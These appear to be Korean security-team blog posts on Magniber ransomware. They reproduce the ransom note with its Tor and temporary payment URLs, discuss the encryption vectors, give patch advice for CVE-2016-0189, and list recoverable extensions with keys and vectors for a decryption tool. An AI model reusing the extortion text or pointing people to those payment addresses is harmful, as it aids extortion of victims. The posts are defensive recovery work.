 http://0290t5v57ebu3f22r41.fitcard.host/WB7Nd859MS90Q017


 http://0290t5v57ebu3f22r41.gappull.space/WB7Nd859MS90Q017


 http://0290t5v57ebu3f22r41.oddnine.site/WB7Nd859MS90Q017


 Note! These are temporary addresses! They will be available for a limited amount of time! 


[변경] README.txt

: URL 주소에서 파란색 표시부분이 벡터가 아닌 확장자 정보에 해당한다. (벡터정보 랜덤하게 생성)


ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!

 ========================================================================================

 Your files are NOT damaged! Your files are modified only. This modification is reversible.


 The only 1 way to decrypt your files is to receive the private key and decryption program.


 Any attempts to restore your files with the third party software will be fatal for your files!

 ========================================================================================

 To receive the private key and decryption program follow the instructions below:


 1. Download "Tor Browser" from https://www.torproject.org/ and install it.


 2. In the "Tor Browser" open your personal page here:


 http://bicjzusdxey82om20w0.xidr33zp37jbu4tv.onion/dpktdqtdz


 Note! This page is available via "Tor Browser" only.

 ========================================================================================

 Also you can use temporary addresses on your personal page without using "Tor Browser":


 http://bicjzusdxey82om20w0.gaveodd.website/dpktdqtdz


 http://bicjzusdxey82om20w0.backfan.site/dpktdqtdz


 http://bicjzusdxey82om20w0.madpart.pw/dpktdqtdz


 http://bicjzusdxey82om20w0.lesssex.host/dpktdqtdz


 Note! These are temporary addresses! They will be available for a limited amount of time! 


따라서 완벽한 복구를 위해서는 확장자와 키 정보 외에 가변적인 벡터정보를 알아야 하는 추가 작업이 필요한 상황이다현재 분석팀에서는 감염 사용자 마다 서로 다른 벡터정보를 획득하는 방법에 대해 연구 중이다. 추후 블로그를 통해 별도의 툴을 제공하고자 한다.

 

랜섬웨어 제작자 역시 가변적인 벡터정보를 알 수 없음으로 테스트로 복구해주는 사이트에서 복구 시도 시아래와 같이 8시간이 소요될 수 있다는 문구가 추가된 것을 알 수 있다제작자도 정확한 벡터정보를 알 수 없음으로 알려진 포멧에 대한 정보와 무수히 많은 키 대입을 통해 유추하는 것으로 추정된다. 또한일부 포멧이 정형화되지 않은 파일(JS파일)의 경우복구가 실패하는 것을 확인하였다.



현재 분석팀에서는 메그니베르 랜섬웨어의 유포지를 지속적으로 모니터링하고 있으며, 이를 바탕으로 아래와 같이 Generic 진단을 수행하고 있다. 또한, 파일진단이 아닌 행위탐지를 통해서도 암호화를 사전에 차단하고 있다.



[Magniber 랜섬웨어 감염방지 방법]


Magniber 랜섬웨어는 멀버타이징 (Malvertising) 기법으로 감염이 되며 악용되는 취약점은 다음과 같습니다. 따라서 해당 취약점에 대한 보안 업데이트를 하지 않으면 재감염 될 수 있습니다. 따라서 반드시 아래 글을 참고하여 보안 업데이트를 진행 해주시기 바랍니다.


- 스크립팅 엔진 메모리 손상 취약점 (CVE-2016-0189)


취약점 대상의 인터넷 익스플로러 버전은 다음과 같습니다.


- 인터넷 익스플로러 9, 10, 11


최신 버전의 인터넷 익스플로러는 다음 경로에서 자신의 OS 환경에 맞는 것으로 다운로드 할 수 있습니다.

- https://support.microsoft.com/en-us/help/17621/internet-explorer-downloads


또한 윈도우 보안 업데이트는 다음과 같이 진행 할 수 있습니다.


- 윈도우 시작 버튼 -> 모든 프로그램 -> Windows Update


Posted by 분석팀

해당 문서는 Magniber 랜섬웨어 중 복구가 가능한 확장자 목록을 관리합니다.

툴의 상세 사용법 등의 추가 정보는 이전 글을 참고 하시기 바랍니다. [링크]


복구가능 확장자

벡터 

kympzmzw

Jg5jU6J89CUf9C55

 i9w97ywz50w59RQY

owxpzylj

u4p819wh1464r6J9

 mbfRHUlbKJJ7024P

prueitfik

EV8n879gAC6080r6

 Z123yA89q3m063V9

rwighmoz

BF16W5aDYzi751NB

 B33hQK9E6Sc7P69B

bnxzoucsx

E88SzQ33TRi0P9g6

 Bo3AIJyWc7iuOp91

tzdbkjry

n9p2n9Io32Br75pN

 ir922Y7f83bb7G12

iuoqetgb

QEsN9KZXSp61P956

 lM174P1e6J24bZt1

pgvuuryti

KHp4217jeDx019Uk

 A4pTQ6886b401JR5

zpnjelt

LyAAS6Ovr647GO65

 nS3A41k9pccn03J2

gnhnzhu

I0727788KuT5kAqL

 sCnHApaa61l5U2R0

hssjfbd

u5f1d693LGkEgX07

 kV35Z1K3JB7z6P06

ldolfoxwu

i24720y16f10qJ21

 fX5U9Z6A2j8ZUvkO

zskgavp

nuu9WO56Gc0N5hn7

 ASY0d6dlyrEH6385

gwinpyizt

 dcQOje3dzW469125

 T5438Nl5VI62XxM8

 hxzrvhh

 EsoNSQ0oaSE614v1

 lEF91UX3DHb1N194

 cmjedin

t65Ytyq8kTBxRsvz 

 w4wP6OG97u9881XB

 dzvtwtqz

 x1BVyu8F455hjop0

 Nc5dS939N5k4cJO2

 pxynindl

M2zCCsnI02BwA044 

 a33PrNnPC5196V1M

sqzprtt 

 m6Nc49V5V54458r5

 L1Y49jXUlA87y72P

 wanmzqw

ku5CMd5Q04D5m836 

zprBfTG14C37A2t8 

 wudltho

 C06185a29O96539t

 Z21763v10u996Ka6

 ftmkyyu

np0dQ328TCZ3X0m3 

dhb1E5ll9is9lf4J 

 twiozfvn

Ri94A630CmT0z9zn 

 U5p18Y9W83QnPcW2

 mncmxtrh

 beW4q941272J41gV

 I35i5z4qw741rS5Q

 yictsss

 IK5y8AeoB6mqJt3U

IS7K85WQZ7SAQ7IF 

 bjyefjc

 g6Ss47O61810npG1

 dFJ13I84R8m8074U

 mjzynopr

 TWa351q6PbCDL062

 DdT89BNpF5893Ay9

 slquvqwl

 gdg8EMkDv4W249jl

 iEaliP0a38PTb266

 engebkljb

 tkK166zMlh50A65I

 l0NV4441rz769hEt

 mxelnjrqa

 GDd145D46H7708l3

 Cw5up332qA5T7032

fkvmhyxp 

 AqnUw8318N9fOqyw

bh1SSx41c9333nNs 

 tjsqpxh

 Dc7T3x6O8hTfe5C4

 e2e42LPE2710L1z9

jumjeax 

 NpRaZ8E8D7k791RN

 dKNg6K3o2thM90p9

phhqjkjt 

 NS5KwT8d4q4NIkV9

 J374w3SdZzQJ0722

 jwlofszwv

 Q335bl2Q3pUI9Uw9

 G5wmgpMg1Bpe2R05

bjnjtjwsd 

E542954FvcqM2E94 

Q3F39Lrw72k99m13 

 ldiozsezr

 b1893I7NIg7J3XoS

n48B7D43YqIF1324 

yqxuphxkt 

 ywRs68r4W2261j05

 K869GX044AXn5DO7

 veynddw

 U384dc6a88zVrlUE

 LpK22c71z103mHHn

 otsnjnzox

s7k4635o1Q73K051 

 nO63aj78k5l532Q0

 gadnynk

n5jQN3976Ji034N2 

 t1V1n5x4YfGx3ZcS

 aycceto

 zvP5090g757abWqg

 us49777rh55UTK99

 dcmexmm

 D094803312sJA65o

 u8YeX2i051i156E9

 kegpmoriq

 tad5256ZmMV8jz7i

 s383czJi0k63CcO8

 gbfyhfpg

 G0n8EA41z15LU335

 Ev8X4xRZ38l5Go45

 jsauiwn

 P2352ruO5hone1v9

 pODla5786q8GkrA8

 cukortpwt

 G4R277xU550rZuRj

 nt38x553ak25kf51

 udhxxzhu

 eCuG29E2J39370zP

 e93R69r77Iym25n0

 gkifuknv

 C0TBS76aT261H387

 d5g51jRBx63H43w9

 wpbkwfnfc

 t2E952y51D1uD7Uk

 cx0f3eIDxi9JH41F

 ogwlkvm

 Xnw66hL87466SH0G

 DLF6I9rZaH9019Hg

 vpixnwtwe

 sKGY4yQb7n6tV1T8

 xVQE7Oj5He4uXg13

 rurkhst

 i2E0bShGl6j3tP7D

 e93YI6l0tX3c814L

 huethtwr

 NJzD955s7q36TB9P

 E3C71uN5n0MI73WH

 oslnvenw

 i5l25844m0BS197G

 Ni8x96vTmS6A727L

 qltzunls

 S8145M7wa8096K0J

 g8877tJu8e5320TE

 gocpygw

 EDO5F92256b36iJd

 J51tvdVen65425cm

 cwejgxri

 i4955Lp2987t2d6Y

 Wz98p3Ptk3rZ96An

 htmurhxgx

 D7Fc17c8kIsRaF86

 V482xOO76HiDyx9h

 frvwyrm

 k9uC65vr4195a187

 n601cRSW74332t1i

 ywxhyjp

 MWdYs0RT9ga0460X

 SCB3337m5450g8s2

 gtiszqhn

 JFIh91761770J4jc

 I7yS448h67t2L551

 ilttgse

 xr2J1Z94168H2G9d

 inr3E479x0SX0tf9

 ohrxfcn

 nDa3177793C1HWu4

 Ztr00g54Fp8vw40N

 kacvgslne

 c27bz7fl0F7me3v6

 iPRXQC2qLC0LN9zJ

 qlmyegogp

 RK11338v64rEA9pF

 N7496uu7Ioj2YmiJ

 sxzjaxe

 eKc3sK2NHOAkN025

 Ubjx93WXE7x14754

 vukhzat

 lUj706009M2r8533

 X772m1bq93440zL3

 tpoawjrv

 MuiyU57c83D12q62

 ToKS8YEu4772r7H5

 sppcxsy

 B14AP7D9cp18q72e

 zzCsXTJdIMV92S01

 kirwfic

 WeOo3n3a18157g9g

 ib10dS466889v44O

 dpksfvg

 aY67tKsU4COYM2L4

 m501s61382008828

 eabsred

 G51goU96462Br04t

 B83A23A0n2x4zg0Z

 yroeswd

 C86KUn2zzqbUSu92

 Sh2Xz75h25u1792v

 bjzhfte

 ry857k9K899mjbSx

 F10xX3774jv7j6A6

 sttkkakql

 x39c23G8AO5Md41R

 Qab51672k02374bv

 eminstte

 GF3x78WhRqa4JPH2

 C7KA0M8ksYjD38K7

 ucmipqts

 fGrw41X80B447d86

 c2237gZ1z5gUHdty

 ywwuyrp

 Zx4614iE36z32z62

 g1neEN8V46204m8x

 mquqjrn

 R86m1mA20ABQ129H

 CS778m68816766P7

 gngegzxbu

 VJ115eoLX6XxLJCe

 A5l1AY378a5H31MV

 wvwvweuoo

 QOB27WeRr11f4F0E

 F4cg461I35bW99L1

 ddvzdmh

 is45dpE4yVN50Ah4

 jq6l9N5QxJG6061F

 xsxdrbrha

 svA62174oLm6A987

da5Am1E19725h3pM 

 afalmdja

 zw59EVl81n5u66u8

n7xKYS4d9TP3QcFL 

 qbexjpirc

 m96j9Q1B343c01c3

ZzI8122knW8d206O 

 hbxckiks

ym7m8OcO279Yy079 

P5U54l3LdB392gG4 

 abymsdoif

yCms8242czzd2G8V 

 jO66P7z209s17585

 ysfaojveu

 Fy7n5j4B6sCLkr27

 a174PbL14262878F

 ewpucsv

B2h6Pa9726bxY503 

 p70R7q5D1l6lALFi

 cfspfpn

 DT82109Z0g6633wT

E6T95FpxU51W31w1 

 lndvvcxh

 T2G4858tobcP72Z6

zS23kzsyyP8APMrd 

 xwimlxeiu

 njf8Uzsdk19EI9i8

 l7d21365875l5Le9

 ozvuseco

 b7wp59i90OA7ZAq2

fw9n5i3392vba394 

 inadrka

PhDmUjlJxEfgj5rC 

V98BG5wJ012uq8hE 

 dmthywcz

 IRu5ep9ql100la36

 c945pQccL0k19QcF

 pvhqkiaej

 C3L9U6jhB3w7Zqz8

 Ijl7qLK00wtvD033

tddyhbt 

GZn2C9Oq30PX1941 

r8e2v7XxI4p1h139 

 cyxysbq

ta7VtUnhqdLsm5TZ 

G2wz4151XxIEK62c 

rzubktx 

g22igD04t95101k6 

 fIbb67uy30r9kQ5n

 rxfrmwpg

i5R697ak4n3wI0ZQ 

 mC5B42P662D2aCYw

 qbheigky

Ku932mU24Ws7nfD3 

 J48um2tY1mIDxxDw

 hsanvuns

I9Dqu8768w559253 

Qt6n05mu2RYCV87L 

ptnlpnekm 

b210F0D4372vONXr 

S71W1y5096S3AfA2 

ghblkfbh 

DgGh00b7TYm81p2G 

 eI0z4jOd4rBk13Xg

ptqzmpr

NK57S333676TR452

WB7Nd859MS90Q017

 hgoxfvg

 N9ozv8ZhOh178A0R

 KsG5r422iZxEoC4L


복구가능 확장자

 키

 벡터

tptucwwt

A330461924y8J9p3

sg5z97117B3426K0

lbddvehx

a38Ul745kK8u35s5

Q60m3150uj7O45ed

zordjtplo

A4162SO2837rgFs7

M09fYp80uO3exkou

uwkvvev

anJCD318blXDF564

VmoZX027LwCg3na8

iwfjjev

aO48D5175i8H08a6

c06Y8c199s09Or58

defxjubv

Asz9e2Pn6eU01wx7

kXot5QtPnH2q6Dv1

hvyusohh

B043tp15G2WriF2S

D02O4CK685Fu4v3j

jkaipybm

b17wyPbctF7JcK81

c41j04nY7xJ18XKj

lbwalgx

b2a7I4t5eTJ9CR09

Y353rQsJLJL0U78W

gcwssbfuw

B4484pQ2w3y6Icq6

X0x117b1Um535FD8

vgvtonaxq

b7243362PRAXXQkZ

m952g10Sd07HXqv3

fzsawvng

b7D1238y59l0dY85

Pyo49A11znVD2961

ampppvrt

b93bJ06h5C641ikF

Ly5qH79GrXWW4555

nibbxutar

be0T41YP3o1m4m1C

E25138g7Xzl17R2Y

rakapah

bkRLK2S1dyp8IiQ6

JL55C9H5285V4Z08

kugqidckf

BQQa26lTahR9D42b

e33RJ348bD6G2f2X

saxujsmyu

bw8lZ5xG7c6vm7G1

ZG9Cs50u0f5883Q1

grlszelrq

BXQU2D58drAI4YuB

jDg99g7s45Ju2Xuu

kivtnure

by48m7A0C73u6O94

m786ZtKy8J2z9pW2

xoziier

bZLHvH75K0m60G3Q

fi7729Y152tfx64d

dfucods

C5G593P0q95hIwV8

L6Ih8EMJ10968Bxy

pulppmg

c7wcpQ63V47lTXZ1

lX6d9J10AEAkz1CH

jozncdx

cPlE6aA609HJKmfH

GQ7682r13624LE1c

dolskfdd

cQq6M5d87R3Rtq0x

Z8Q3rJ077RVMt358

mpxzafam

cSH07L18GE5609M7

fRY1633IunAF6p4c

jxrhgat

CZH7Fy6Q537ycWX3

R9Ltm45J2oVk7ciZ

pluazeg

D4229pAvO0l2cU7G

ketVHNP3d4bC5Ra0

nsqzmwh

d56DPK92O2xWq9Fl

x0p8uRI24WX553K5

kiptsmzle

D8p72XJ65728HdUa

T05HpLtw6st73UZc

chpgikk

D9b3z0j901o4735k

kl4Q16lu3t58uHf8

ypmdkvac

Ddy4ceuHO4W2r470

x061z2Y31128P3mk

eqevdijsg

dLv254e1K2P6CXU5

a15841F19N1SmD8O

fmfsgkqd

DSG7Da7iR61ImImQ

B5gy0j816hVn6r5w

lqwoxojgs

E11x02h6tF651QLF

bu573XbsDj7A6KZK

eihcwor

E185U8c6q2985141

cYOvSQ12TYj60J4N

zzzscixcq

e32i944jXgX4A296

c6p8s1DJh94KU58S

bzrxdzo

e63Q3496k2Q5M7Q2

L1p8NCOIYF066Q6s

pxmqmpo

e69327Ggj2q3G7Sp

qk7070I08kL9Qihx

varulgaej

E8dO5A041a5D48o8

N4561H6O19SK0YV0

nwpkjoz

eiXdNH96317y1P70

cBl522j9RT3SVuPL

wqtmfil

EL76Wn6uIRI73Yfj

TE515HQ571it4f04

yxyzuyet

EWfaJ95a5as1Stw6

a06R3O20840a9hWi

sehupakic

eXN970836CP67LI8

JOEH85it09qAi74y

vguvsgejh

F18hE01E82y7k4p1

l769W59l0E0ZYo63

kvrdhmyrx

f2Kk640D7Pyo6A5D

Jibr6EvVLOMW1q5T

nejhdgd

f4PPp53863Tk47y7

l4CmFqc8UPIz2K6X

xajfdvo

F77xaa55R83E035r

d0tO80blz6003396

gbipirx

f87S4HpIZH97S178

SP58UNgid01N104S

jsyjuom

F8Fa55eG427pWy6G

d7gMGV6Q2Na61559

owhbdbii

fJJMY9419834Wb1X

aG20K8sUzXOWVk7R

orqjbqlw

fJrQ33yW162L8ArM

N78M7d0A618625Kt

yihvogi

FSIPE51e0j925a4H

uSU10jYZ3r93739H

dfbsvoi

fUyp7pm9727F2m0C

ft5vP705OqC4fRY6

nxvibarm

g10766Np34VL1ATl

C0iU601FyKzV27J1

nvmfyqtr

g1ta3gzqQ95N9314

D17738VE38jAZU53

yqusccvjs

g4n38V7o6k77vM3n

X3A4f9UHq1k1n36P

qgsxyzidg

g5eIdGlVqO9s1Naj

Nu4996t2h6m7K3bx

veidrssph

G8DPM9P4Qy3259e7

j6IGQx4k52C7Tc2I

aosrnmlh

GOe67b0V68NSvk3T

g843vn3718o42T79

eosfqaw

gvpPyV7bL16B2R7E

I1p74M6i1h0W0awY

uazwgcb

GxJ8P6G5XQ23Qfo1

e207Y29d6V495eIB

piouqjwhh

i1438z9Vf3G7oECJ

m5T03C6u8GEd10A4

qmrlvewfz

I14443L0lGB85439

FX3PqM0MvUG5HIOr

gtayhcybh

I2j8LU2vSA9T28c1

XPHIi02013jt160Z

yokiqfnh

i366h17h16r5la10

I24E8I7u9cXU3t37

owkjugjhz

I4a42v4v2sl24182

Xp8oa2s8SzAg13ql

wmhllph

I55mP3gMv984d1j9

D9TQ4zD3R60x116a

mtjoqjlp

I56623G4307U6fV7

LCL5i17985j709m1

yacadvjua

I6Bn0M735098Z44p

EY45M2gs17Dh2Vy7

xmzcpmcnm

i94Qf6295wU29143

n942bjin9329RO92

ktqzoasic

ictAAKt9jSqy0k78

S25H98z31YcWU943

ceofwwovn

IDTw4j0q3i9125j3

PQA33m736005W4zg

fndljgjxi

IFI2X90Z6W7Sxv98

k4C9rK210w5i7GIt

epkqrkw

iFs216g4cb8V98TQ

Y34M3eDzt3L092Ck

xnzjxdlpo

ij0Ao3601X69O8H8

ICFd773d4hCM5tm9

hnulvoo

Ij16sw15u8OQmd11

Mi1Z5DQu9Dyh9lfI

jfvgmby

Io7G1Dnv86lr5Q4Y

VLG8iaoF6PRu8s7e

hvxtivt

iRkH0h436BykW3ZA

c7i43t699Y5Dm09G

rcerfjglu

It35Fgolf2E509FI

E025s22FK7h8tn64

xmfwemss

iuQR8138720D5n29

i07ABfS24mk9mq7e

dasxmuzk

ix34b7ruTH05FTv7

xnHoP1IB867a3u7s

spnxdiqmy

j0LI533s6EbR7186

Fl02Hy68Q29A64O7

wbltymhoy

j2A73e34R76PWO3K

u0RK0q4048Z91F15

flihwxzqv

j2P1oNu8yYpI3dJ5

l3GF81Lo943eg520

zgaazpz

J3W5RF0NFe0827V1

NjO775U545g27qMB

hjanfemhf

j6J5fmb2QKGd1vX0

dsi70d21A15SDSOP

nlooiaxfg

JA2v3455W9Xy7wuL

eGcby86427c2Qq07

jewwdrnh

JeQ4037f7LFS8Kdt

blfrX648YR05Pt06

yqjpdfzzh

jfv2656Lovt943G9

L06L1d580075lrL7

xlnthrtyk

Ji83r9U4Oc8F856F

EA67n7P179Ku3051

lweqspih

jjBr77A0432iIT53

GZ470Jr49JWXVpjm

uordkbs

Jjsl66Q3yI1Qw0r3

J54785J3Ck17663I

wfdrwcf

jTpqX282311P7w9L

F04Pu3198j6Q26WP

tsddqero

jv20s8tV4dW0U59T

TGr8r7n09sw1J9zP

drgzprn

K1qK410X3U5bCh06

c3640C14MD7r5k00

fggjekvsm

K4v7eo99My847R99

i9lKh6M10Z868118

aecbgeosp

K601I74w60aOc9i9

GVL4MbDcKi8HO45U

hcapkvy

K8gG9t4194kEPA56

af1591Uu3zp7qf97

sjqdrcc

kh7hi556Qa796vdQ

GoF2ZYql5F6wC70h

zjqryvkik

Kk5B751HpR3k9433

uU30juT2OX9dt4Wh

aqajrzrvb

kN7vXerY8Y61tyCI

Mq5m120zb3eICkK0

igydlgihj

kqx14LoUf31Fmg8G

YR81J5BH1k6z72R2

dicfhzz

l09l08x5V42yn8NC

D0W355A9L5979Q2B

omigfwgfj

L6835j4N2b0o30zC

F2N55D454O1VcUl5

ovzhfln

L685ci3L08T39802

jS7P3s6MnTRy71s9

kuzwhyqhn

l86445S74w5h0Xq4

ivHdS9B950T91684

mrjgulk

LBUE60D60uR9yysr

R88621DBulo4ay95

pmrcxedz

lm78p3Sr618X6H73

J96ur5Eme5GA71q1

czbaghow

Lm8o9e2a28rR2nCC

N0207LSF2300A65U

xlmupxgup

LR9F849nU19216Ga

NkFKi57LrSLPxcFx

adgjpyfhs

lTv90X3o897Z43d6

Fif19x3r84V3773l

vawzlqwcb

M0982u2v1l4E97R7

iVzlv09u4E8A03s3

pxynindl

M2zCCsnI02BwA044

a33PrNnPC5196V1M

hxevydof

M3Z16344tR3Jlfd6

We95937ZCU0e6Jz9

dcmkdzt

m4652AjfEB8U5C94

F91f083m4Xo3J65m

xapudecz

M829dhH3j4C0645Q

I58h44cO176Ev2Z6

whxdyab

m88687BF21cz5N30

B5890051Km99sib7

njoxiffb

M9j78A06KA8L7p3M

y5Zaw2b69lMK69ew

zuqpqkz

MexXih15d326BEG7

e1hR8O67aT39006b

vrklzimn

Mn681m322ROqJXoZ

KOu4060X44EQ0618

npqdnxui

MnG8oFsL6fX0H13T

Lz5v7Vc26keJ1m0E

cjakjko

mOQN9z72xDv11l26

DV78ru93626r1A3p

yzurnwszl

Mrw853508FxA395K

x7r87U00p9083192

sjntqmxiy

MtHjy78r7mL603nl

eiA5y5qy4x2T1Zfa

iaanlfhpx

mUI4eau9Pa7Z2a4P

l5eeyyefSH2016QY

tckzlztg

n2Om62ToR86jn8Jb

qr3f8Fto9Zdjwy56

suoltyql

n455x9ndQc9UlK6h

GB6T7n93026AU0y1

zexhvgmpv

n631E3n3OUQ52FF8

NI8r38D35jH77CZU

otipslja

n9951HN5eau4icW1

e2kL2R90ZC43P8j8

auwknwxvn

NA4A0112T64U6965

U7N1oJa9qD43l025

upjbubr

Nc1d2Z6l5z80a4z4

sU331G2rQd2mk390

mcxsraw

Nr90983O95m8LF7K

pOo1qL81xH590ALP

qjpoqzrgr

Ny2237aB7vRAZ7i0

C3D9Qr6J671r11G7

kivkopdym

nyJ6GHZ2A8SU98D3

bo5KD99tXG8178CS

rhuvresfm

p4lWYF0Q5YD7cKX0

nN00dwzk3jfg8SAB

dbjauesek

p858G4W9r331sF42

s3Ai6w57GLt6998J

inwkter

pN7OI283pU0f15rO

eYOI3p7i050bcEt8

pjdajwx

pSyG93UK256Eitqe

e02UmR97J5196a0m

uxxyaux

Px07J4i0S1dqDcEa

gbTWa67xBb550140

ztowimtxq

q0B0Fv6YL3KJPE2i

Wq0ju1T914n9r0PN

iynthoioj

q22458n3936rMI83

BO4WN27aV1687230

zoanmba

Q2X1x8E03i433G53

gx2pA3705wmpN70B

vvznovp

q3pNe2gC3695a1f1

PEo11R780Em9E8m9

kohkddwp

q7j76898ptv71094

Z73DyR88tFG1cIUV

eyqfqmqod

Q9S20z14D1fX2ev3

UY0g436860i4AFtK

gdyusodd

QD4y9J2m4G34eE78

C8h5w2L6jg8TdQz9

cmkvlvr

qgXhu1QAw69H7G28

v6n114147O8441WR

bavdwjir

Qh9jIG1d356Z8A57

z049Rrm50U0sG7D5

hovrpyzwz

QM1L6n9x346V70YG

iy27M30cb21I204a

vcjxopq

RA34I1F35XY29x10

tS3Fd3IfJKSw7918

ytfrnjocr

rcO3T1Y6z9Gt061A

ZPpNU551235S2Oz8

rhxwwbe

RdP17hT30C25p3xH

N2j4RF7103cue82P

dqckgzz

Rudg83K16pTeQ96k

IDU31h98PAr02869

nhxalxkol

S7Wgvb0W85R5605W

f65cujZAn4Ul0EQ1

lvuqkxi

s87zLF6yf1JGAkoS

F69036R06397r176

ctffcqen

s8K86k5Q6n7R06L9

K06296slW865E063

ssltrpc

SA536076dbc4bXo4

Fn667221t15uKhf8

swxylyh

SHN5uObQKcfI4kn9

kD56v1605448k3r2

bscdmdqkg

SoZ7yHM6JqXcJ8an

Iu18S8100525dC28

vvycltcwu

Sp56ob4558B2071j

M2vRT008A4IeRu09

zyazaqi

T0Xp56o784o4N9q6

iu6d71sqg8OWR1a7

ezjasdu

Tn6253SfxZaheR41

D7R66y1724z89M2l

ovlmooo

U02g643nK9b9787M

E1o5Po21838RV6u9

cqhrdfhp

u541oP73IA1RL904

P36Rvm98Xi4gCklW

ippuhkky

u7t826bQBo7NQp1v

i6t2B6g897P4P1PJ

zghmlcchv

U88D1ti82GLicE92

CF5tf56v79353lTh

feviyat

U948Zw9c312xS678

a25sZ851zUK27263

jbhfqzm

u96aN3934817I6q3

S6CX07c636V50Cc9

lyxtdoyz

utK1E0q4x14Tw374

Ef026lHr48i7m066

jueonftx

uTlA4n116Jn8A325

Pg8286r0gT0198uS

fhpjvusz

Ux4ZsI528bbFYa3I

XB9z02e1nvz09k9y

jjeresvdk

UZq796Mk2N6a4iCS

Ni51u7g56Kgl18gy

wqfsoqij

V44KG87q70FU5u08

E2aag0q4437l892D

gsugbuym

v5M228q8x58Ua6HY

U3g76kkAI2LGlJe2

kldesalce

v6zN6020reIzlsH9

l5Gk77DWdc9pS063

uudbjqjqj

Vf09y77C7IlT4227

DO3q0v24smZ9xhV8

sxmbvvxpz

w5aYW3B4124C5S85

x23pac63177TLt91

rvwrcgeto

w72448570ffZ62yR

BB0h551j39j658O2

iidrfzu

w9EF3j1O8794rWR8

FH198h98n399UmC5

mneddvd

wMmW4l4YHOVWambK

MQ84Gd167CB397UA

rdfiyenc

WRKlxxERCpsV1lX0

D12W5459w8G0yHVn

yodiysbpp

x179nW4T6OT66giO

ryqe9qHo94nX029i

flwjobf

xKb67W985xZJ762p

SC6M485e3z12DJ9w

czlwpqjx

xL464245Q567Sk2c

n406HcU2lN2tM0nR

mllswoeko

XZ31pPVe4568U3w8

jKwL0Z7d9w70h42O

bvhttjjj

y10258487dI0V33g

X645x9s046ws3aB7

sqqyzkb

y4779s08H91ap3Z0

l36pUU4u7U5E0oU0

pmiwovlto

y932Z7Foos951wge

B7jbyM6mTXLcD58v

qyphposl

yf0U407AtH3T7xT4

Qfz2530971i6zvMl

uipdyyfsg

yT0iVg38r9E4ksYZ

jb6Q72q32Gd5G7M1

htrsvkhnj

z3m8M941M8W50728

aG753yys9u1J052Q

bjlduooa

z4T73rmsE454QF8J

NRV28hydakG23ds9

uwsgpyl

z71v755928w5L530

x7976G62p6RRi96A

ygngumzgl

Z81T3v6K1iIFyJ0D

Jp7C46P9Z1vb94By

yfsepzs

Z870780e5iM0984f

ND60M54hR9STP565

agcevflsx

zA992i8G28c3d6pa

d70892406SiCU3v3

bvxzqlmp

ZG8701xJAGO76GX7

Wc0JXq253dIUMP80

xxzbrah

zTLBP5mJvj5U13n3

EBW2TOs0n93TFYE6



// 3월 1일 ~ 3월 31일 까지의 확장자/키/벡터 정보가 업데이트될 예정입니다.



[사용 방법]


1. 압축파일 내부의 Run_Me.bat 파일을 메모장에서 열고, 확장자/키/벡터 값을 기록하여 저장한다.




2. Run_Me.bat 파일을 오른쪽 마우스로 클릭하여 관리자 권한으로 실행한다.




[복구툴 Hash]



Posted by 분석팀